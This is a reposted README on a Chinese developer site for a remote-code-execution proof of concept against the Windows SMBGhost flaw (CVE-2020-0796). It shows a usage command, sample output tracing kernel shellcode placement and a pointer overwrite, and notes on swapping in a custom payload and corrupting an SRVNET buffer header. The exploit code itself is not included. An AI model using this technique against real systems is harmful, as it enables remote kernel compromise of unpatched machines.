内容简介:RCE PoC for CVE-2020-0796 "SMBGhost"For demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using thi
SMBGhost_RCE_PoC
RCE PoC for CVE-2020-0796 "SMBGhost"
For demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die.
Now that that's out of the way....
Usage ex:
$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131 [+] found low stub at phys addr 13000! [+] PML4 at 1ad000 [+] base of HAL heap at fffff79480000000 [+] ntoskrnl entry at fffff80645792010 [+] found PML4 self-ref entry 1eb [+] found HalpInterruptController at fffff79480001478 [+] found HalpApicRequestInterrupt at fffff80645cb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000a00! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly...
Replace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself.
lznt1 code from here . Modified to add a "bad compression" function to corrupt SRVNET buffer header without causing a crash.
See this excellent write up by Ricera Security for more details on the methods I used: https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
以上所述就是小编给大家介绍的《SMBGhost RCE PoC》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Linux二进制分析
[美]瑞安 奥尼尔 / 棣琦 / 人民邮电出版社 / 2017-12-1 / CNY 59.00
二进制分析属于信息安全业界逆向工程中的一种技术,通过利用可执行的机器代码(二进制)来分析应用程序的控制结构和运行方式,有助于信息安全从业人员更好地分析各种漏洞、病毒以及恶意软件,从而找到相应的解决方案。 本书是一本剖析Linux ELF工作机制的图书,共分为9章,其内容涵盖了Linux环境和相关工具、ELF二进制格式、Linux进程追踪、ELF病毒技术、Linux二进制保护、Linux中的E......一起来看看 《Linux二进制分析》 这本书的介绍吧!
HTML 压缩/解压工具
在线压缩/解压 HTML 代码
随机密码生成器
多种字符组合密码